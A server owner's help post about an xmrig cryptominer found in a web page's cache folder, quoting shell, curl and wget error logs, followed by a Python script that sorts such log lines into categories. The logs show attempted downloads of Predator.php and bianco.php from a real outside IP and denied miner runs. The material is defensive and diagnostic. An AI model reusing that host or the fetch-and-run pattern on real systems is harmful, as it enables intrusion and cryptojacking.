I noticed that someone managed to put a mining virus, xmine, on my server.
It was mining for a few days until I noticed that the processor was up to 90%. I deleted the virus and enabled SELinux.
Today I see the virus again in the cache folder of the web page, but it is not running.
How can I prevent viruses from being uploaded to the cache folder of the web page?
I found this in my log files:
sh: line 0: cd: HOME not set
sh: a.jpg.jpg: command not found
sh: line 0: cd: HOME not set
sh: a.jpg: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0Warning: Failed to create the file Predator.php: Permission denied
4 43704 4 1927 0 0 4323 0 0:00:10 --:--:-- 0:00:10 4330
curl: (23) Failed writing body (0 != 1927)
sh: a.jpg.jpg: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0Warning: Failed to create the file Predator.php: Permission denied
4 43704 4 1930 0 0 8711 0 0:00:05 --:--:-- 0:00:05 8693
curl: (23) Failed writing body (0 != 1930)
sh: a.jpg: command not found
sh: a.jpg.jpg: command not found
sh: a.jpg: command not found
sh: a.jpg.jpg: command not found
sh: a.jpg: command not found
sh: a.jpg.mp4: command not found
sh: a.jpg: command not found
sh: ./xmrig: Permission denied
sh: ./xmrig: Permission denied
--2017-10-10 04:12:41-- ftp://14.162.143.195/bianco.php
=> 'bianco.php'
Connecting to 14.162.143.195:21... failed: Permission denied.
Retrying.
--2017-10-10 04:12:42-- ftp://14.162.143.195/bianco.php
(try: 2) => 'bianco.php'
Connecting to 14.162.143.195:21... failed: Permission denied.
Retrying.
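The lines quoted in the post are error output from sh, curl and wget. As an added example (not part of the original post), this Python script groups such lines by what they show: commands the shell could not run, file writes and executions that were denied, and remote fetches. The rule names and function names are made up for this example, and the sample is an excerpt of the log lines in the post.

```python
import re
from collections import Counter

# Excerpt of the log lines quoted in the post above.
SAMPLE_LOG = """\
sh: line 0: cd: HOME not set
sh: a.jpg.jpg: command not found
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0Warning: Failed to create the file Predator.php: Permission denied
curl: (23) Failed writing body (0 != 1927)
sh: a.jpg.mp4: command not found
sh: ./xmrig: Permission denied
--2017-10-10 04:12:41-- ftp://14.162.143.195/bianco.php
Connecting to 14.162.143.195:21... failed: Permission denied.
"""

# Each rule: (label chosen for this example, regex capturing the value of interest).
RULES = [
    ("shell_command_failed", re.compile(r"^sh: (?:line \d+: )?(\S+): command not found$")),
    ("shell_exec_denied", re.compile(r"^sh: (\S+): Permission denied$")),
    ("curl_write_denied", re.compile(r"Failed to create the file (\S+): Permission denied")),
    ("wget_fetch", re.compile(r"^--[\d-]+ [\d:]+--\s+((?:ftp|https?)://\S+)")),
    ("outbound_blocked", re.compile(r"^Connecting to (\S+?)\.\.\. failed: Permission denied")),
]

def triage(log_text):
    """Return {label: Counter(value -> hits)} for lines matching a rule."""
    findings = {label: Counter() for label, _ in RULES}
    for line in log_text.splitlines():
        for label, rx in RULES:
            m = rx.search(line.strip())
            if m:
                findings[label][m.group(1)] += 1
                break  # first matching rule wins; a line is counted once
    return findings

def report(findings):
    """Format findings as one line per (label, value), most frequent first."""
    rows = []
    for label, counter in findings.items():
        for value, hits in counter.most_common():
            rows.append(f"{label:22} {hits:3}  {value}")
    return "\n".join(rows)

if __name__ == "__main__":
    print(report(triage(SAMPLE_LOG)))
```

Lines that match no rule, such as `cd: HOME not set` and the curl progress rows, are ignored rather than reported.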